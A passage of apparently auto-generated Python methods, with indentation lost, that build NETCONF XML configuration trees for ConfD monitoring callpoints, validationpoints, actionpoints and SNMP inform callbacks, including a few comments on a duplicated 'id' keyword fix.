confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
daemon_id = ET.SubElement(daemon, "id")
# 'id' was already consumed above as the callpoint list key, so popping it
# again would raise KeyError; the daemon id arrives under a distinct keyword.
daemon_id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(callpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id = ET.SubElement(validationpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
daemon_id = ET.SubElement(daemon, "id")
# 'id' was already consumed above as the validationpoint list key, so popping
# it again would raise KeyError; the daemon id arrives under a distinct keyword.
daemon_id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")  # 'default' is an empty leaf in the confd-monitoring model; no text is set
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
daemon_id = ET.SubElement(daemon, "id")
# The generated code popped 'id' twice (the validationpoint key above and the
# daemon id here), which raises KeyError; assume the daemon's id is passed as
# a distinct 'daemon_id' kwarg.
daemon_id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(validationpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id = ET.SubElement(actionpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
daemon_id = ET.SubElement(daemon, "id")
# The generated code popped 'id' twice (the actionpoint key above and the
# daemon id here), which raises KeyError; assume the daemon's id is passed as
# a distinct 'daemon_id' kwarg.
daemon_id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")  # 'default' is an empty leaf in the confd-monitoring model; no text is set
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
daemon_id = ET.SubElement(daemon, "id")
# The generated code popped 'id' twice (the actionpoint key above and the
# daemon id here), which raises KeyError; assume the daemon's id is passed as
# a distinct 'daemon_id' kwarg.
daemon_id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(actionpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id = ET.SubElement(snmp_inform_callback, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
daemon_id = ET.SubElement(daemon, "id")
# The generated code popped 'id' twice (the callback key above and the daemon
# id here), which raises KeyError; assume the daemon's id is passed as a
# distinct 'daemon_id' kwarg.
daemon_id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_default(self, **kwargs):
